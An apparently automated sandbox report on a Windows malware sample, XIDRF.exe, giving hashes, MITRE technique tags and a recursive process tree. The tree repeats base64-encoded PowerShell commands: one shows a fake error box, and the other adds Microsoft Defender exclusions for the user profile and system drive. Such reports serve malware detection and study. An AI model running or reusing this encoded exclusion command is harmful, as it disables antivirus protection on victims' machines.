294e27afe4e0d79c7fa2d94699b95a54dbc4176603083ad5f0fff6a0c1f698d8

Analysis

max time kernel
2s
max time network
54s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
22/11/2023, 17:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XIDRF.exe
Size

40.2MB
MD5

e8e93e4c8396aa3792f020f10f67f9fc
SHA1

25349054267945301cdd8816290e2f7022c927eb
SHA256

294e27afe4e0d79c7fa2d94699b95a54dbc4176603083ad5f0fff6a0c1f698d8
SHA512

efabc20676a88c3a02ea66b99c68949d81584f70f06602f48de62ceb2a325d3bf40ada69f46a0d764c40123763f095a7745f819a016d6a3f47e9f755728339fa
SSDEEP

786432:C+FZZ4/nNYHNTmMRdY18jqynymTRI0ryBr+ri1Jnar2L+:r7AnN6pmMo18tC0ryBr+rivg

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation	XIDRF.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 3596 wrote to memory of 3724	3596	XIDRF.exe	86
PID 3596 wrote to memory of 3724	3596	XIDRF.exe	86
PID 3596 wrote to memory of 3724	3596	XIDRF.exe	86

C:\Users\Admin\AppData\Local\Temp\XIDRF.exe
"C:\Users\Admin\AppData\Local\Temp\XIDRF.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3596
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGsAdgB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG4AZABmACMAPgA="
  2⤵
  PID:3724
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdABiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZQBxACMAPgA="
  2⤵
  PID:1048
- C:\Users\Admin\AppData\Local\Temp\XIDRF.exe
  "C:\Users\Admin\AppData\Local\Temp\XIDRF.exe"
  2⤵
  PID:3064
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGsAdgB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG4AZABmACMAPgA="
    3⤵
    PID:3184
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdABiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZQBxACMAPgA="
    3⤵
    PID:4272
- - C:\Users\Admin\AppData\Local\Temp\XIDRF.exe
    "C:\Users\Admin\AppData\Local\Temp\XIDRF.exe"
    3⤵
    PID:4008
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGsAdgB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG4AZABmACMAPgA="
      4⤵
      PID:4976
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdABiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZQBxACMAPgA="
      4⤵
      PID:1948
  - - C:\Users\Admin\AppData\Local\Temp\XIDRF.exe
      "C:\Users\Admin\AppData\Local\Temp\XIDRF.exe"
      4⤵
      PID:3908
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGsAdgB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG4AZABmACMAPgA="
        5⤵
        
        PID:2292
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdABiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZQBxACMAPgA="
        5⤵
        
        PID:4600
    - - C:\Users\Admin\AppData\Local\Temp\XIDRF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XIDRF.exe"
        5⤵
        
        PID:4708
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGsAdgB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG4AZABmACMAPgA="
        6⤵
        
        PID:4620
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdABiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZQBxACMAPgA="
        6⤵
        
        PID:4732
      - C:\Users\Admin\AppData\Local\Temp\XIDRF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XIDRF.exe"
        6⤵
        
        PID:4404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdABiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZQBxACMAPgA="
        7⤵
        
        PID:2148
        
        C:\Users\Admin\AppData\Local\Temp\XIDRF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XIDRF.exe"
        7⤵
        
        PID:2592
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGsAdgB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG4AZABmACMAPgA="
        8⤵
        
        PID:2928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdABiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZQBxACMAPgA="
        8⤵
        
        PID:3284
        
        C:\Users\Admin\AppData\Local\Temp\XIDRF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XIDRF.exe"
        8⤵
        
        PID:3932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGsAdgB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG4AZABmACMAPgA="
        9⤵
        
        PID:4116
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdABiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZQBxACMAPgA="
        9⤵
        
        PID:1392
        
        C:\Users\Admin\AppData\Local\Temp\XIDRF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XIDRF.exe"
        9⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGsAdgB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG4AZABmACMAPgA="
        10⤵
        
        PID:3488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdABiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZQBxACMAPgA="
        10⤵
        
        PID:1480
        
        C:\Users\Admin\AppData\Local\Temp\XIDRF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XIDRF.exe"
        10⤵
        
        PID:5160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGsAdgB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG4AZABmACMAPgA="
        11⤵
        
        PID:5448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdABiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZQBxACMAPgA="
        11⤵
        
        PID:5520
        
        C:\Users\Admin\AppData\Local\Temp\XIDRF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XIDRF.exe"
        11⤵
        
        PID:5680
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGsAdgB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG4AZABmACMAPgA="
        12⤵
        
        PID:5948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdABiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZQBxACMAPgA="
        12⤵
        
        PID:5968
        
        C:\Users\Admin\AppData\Local\Temp\XIDRF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XIDRF.exe"
        12⤵
        
        PID:4296
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGsAdgB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG4AZABmACMAPgA="
        13⤵
        
        PID:5516
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdABiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZQBxACMAPgA="
        13⤵
        
        PID:5340
        
        C:\Users\Admin\AppData\Local\Temp\XIDRF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XIDRF.exe"
        13⤵
        
        PID:5688
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGsAdgB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG4AZABmACMAPgA="
        14⤵
        
        PID:5680
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdABiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZQBxACMAPgA="
        14⤵
        
        PID:768
        
        C:\Users\Admin\AppData\Local\Temp\XIDRF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XIDRF.exe"
        14⤵
        
        PID:4372
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGsAdgB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG4AZABmACMAPgA="
        15⤵
        
        PID:5284
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdABiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZQBxACMAPgA="
        15⤵
        
        PID:2244
        
        C:\Users\Admin\AppData\Local\Temp\XIDRF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XIDRF.exe"
        15⤵
        
        PID:6016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGsAdgB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG4AZABmACMAPgA="
        16⤵
        
        PID:5252
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdABiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZQBxACMAPgA="
        16⤵
        
        PID:6072
        
        C:\Users\Admin\AppData\Local\Temp\XIDRF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XIDRF.exe"
        16⤵
        
        PID:2228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGsAdgB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG4AZABmACMAPgA="
        17⤵
        
        PID:3932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdABiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZQBxACMAPgA="
        17⤵
        
        PID:6180
        
        C:\Users\Admin\AppData\Local\Temp\XIDRF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XIDRF.exe"
        17⤵
        
        PID:6308
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGsAdgB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG4AZABmACMAPgA="
        18⤵
        
        PID:6604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
